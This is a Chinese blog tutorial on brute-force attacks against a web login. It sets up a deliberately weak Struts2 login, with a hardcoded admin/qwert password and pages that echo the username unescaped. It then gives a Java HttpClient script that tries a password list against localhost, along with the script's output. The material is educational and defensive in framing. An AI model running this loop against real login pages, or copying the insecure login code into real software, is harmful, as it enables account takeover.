看好你的门-验证机制被攻击(2)-JAVA蛮力攻击登陆

首先需要声明，本文纯属一个毫无远见和真才实学的小小开发人员的愚昧见解，仅供用于web系统安全方面的参考。

1、 简单说明

攻城的时候，城门总是最容易被攻破的地方。
而登陆功能的公开性，让无数的攻击者都试图猜测用户名和密码，从而获得未授权访问系统的权利。
这种攻击几乎无处不在，有系统的攻击，也有无聊人士的攻击，设置一些搞错了用户名用户的无聊尝试。

2、 前提和准备

我们首先需要有一个弱密码的系统，这样才可以去尝试蛮力攻击。
不要用这种方法去攻击第三方的应用，这是不道德和不友好的行为。分享这种方法，主要是因为这种攻击过于普遍，如果系统所有者和开发者不重视这个问题，很有可能辛辛苦苦做的系统，别人攻破。

3、 准备用的系统的登陆页面

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>阿饭同学的测试</title>
</head>
<body>
    <form action="aEasyLogin.action" method="post" name="form1">
        <table width="392" border="1">
            <tr>
                <td height="35"><br>
                    <div align="center">
                        <p>用户名：<input type="text" name="username" size=16 ></p>
                        <p>密码： <input type="password" name="password" size=16 > </p>
                    </div></td>
            </tr>
            <tr align="center">
                <td colspan="2" bgcolor="#FFCCFF"><input type="submit"
                    value="登陆" /></td>
            </tr>
        </table>
    </form>
</body>
</html>

4、 模拟登陆验证的JAVA代码

package com.safe;
import javax.servlet.http.HttpServletRequest;
import org.apache.commons.lang.xwork.StringUtils;
import org.apache.struts2.ServletActionContext;
import com.opensymphony.xwork2.ActionSupport;

public class EasyLoginAction extends ActionSupport {
    private static final long serialVersionUID = 1931829246016041219L;

    public String execute() throws Exception {
        HttpServletRequest request = ServletActionContext.getRequest();
        String username = request.getParameter("username");
        String password = request.getParameter("password");
        request.setAttribute("username", username);
        // 用户名和密码如果有一个为空，返回失败
        if (StringUtils.isBlank(username) || StringUtils.isBlank(password)) {
            return "false";
        }
        //简单假设一个用户名和密码：admin,密码：qwert
        if(username.equals("admin") && password.equals("qwert")){
            return "success";
        }else{
            return "false";
        }
    }
}

5、 登陆成功的jsp页面

<%@ page language="java" import="java.util.*,javax.servlet.http.*" pageEncoding="UTF-8"%>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
    <title>看好你的门 - 阿饭同学</title>
  </head>
  <body>
    登陆成功，欢迎来自<%=(String)request.getRemoteAddr()%> 的：<%=(String)request.getAttribute("username")%>   
  </body>
</html>

6、 登陆不成功的页面

<%@ page language="java" import="java.util.*,javax.servlet.http.*" pageEncoding="UTF-8"%>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
  <head>
    <title>看好你的门 - 阿饭同学 </title>
  </head>
  <body>
    <%=(String)request.getAttribute("username")%> , 登陆不成功，请检查您的密码。 
  </body>
</html>

7、 JAVA蛮力攻击登陆的代码

package com.safe;

import java.util.ArrayList;
import java.util.List;

import org.apache.http.HttpEntity;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;
/**
 * 用httpClient 模拟暴力攻击登陆，仅供用于WEB安全防范示例。
 * 
 * @author 范芳铭
 */
public class EasyAttackLogin {
    //常用密码列表，仅用于示例
    static String[] passwords = {"123","qwert"};

    //已经获取了用户名，假设这个信息我们已经知道
    static String username = "admin";

    public static void main(String[] args) throws Exception {
        CloseableHttpClient httpclient = HttpClients.createDefault();
        try {
            //模拟用户登录
            HttpPost httpPost = new HttpPost("http://127.0.0.1:8080/webStudy/aEasyLogin.action");
            EasyAttackLogin attack = new EasyAttackLogin();
            for(int i = 0 ; i < passwords.length ;i++){
                attack.getLogin(httpclient,httpPost,passwords[i]);
            }
        } finally {
            httpclient.close();
        }
    }

    public boolean getLogin(CloseableHttpClient httpclient,HttpPost httpPost,String pass) throws Exception{
        boolean flag = false;
        List <NameValuePair> nvps = new ArrayList <NameValuePair>();
        nvps.add(new BasicNameValuePair("username", username));//用户名对应的key
        nvps.add(new BasicNameValuePair("password", pass));//密码对应的key
        httpPost.setEntity(new UrlEncodedFormEntity(nvps));
        CloseableHttpResponse response = httpclient.execute(httpPost);

        try {
            System.out.println(response.getStatusLine());
            HttpEntity entity = response.getEntity();
            String content = EntityUtils.toString(entity);
            //登陆成功的页面有这个关键词，需要观察后得出
            if (content.indexOf("登陆成功") > 0 ){
                System.out.println("密码暴力破解成功，用户admin的密码为：" + pass);
                flag = true;
            }
            EntityUtils.consume(entity);
        } finally {
            response.close();
        }
        return flag;
    }

}

运行结果
HTTP/1.1 200 OK
HTTP/1.1 200 OK
密码暴力破解成功，用户admin的密码为：qwert

8、 无处不在的安全隐患

1、 在所有的可能性中，密码被攻击，是最常见的行为；
2、 现代的PC的硬件和网络条件，让暴力攻击登陆成为一件很稀松平常的事情；
3、 不要尝试去攻击别人，这很不友好。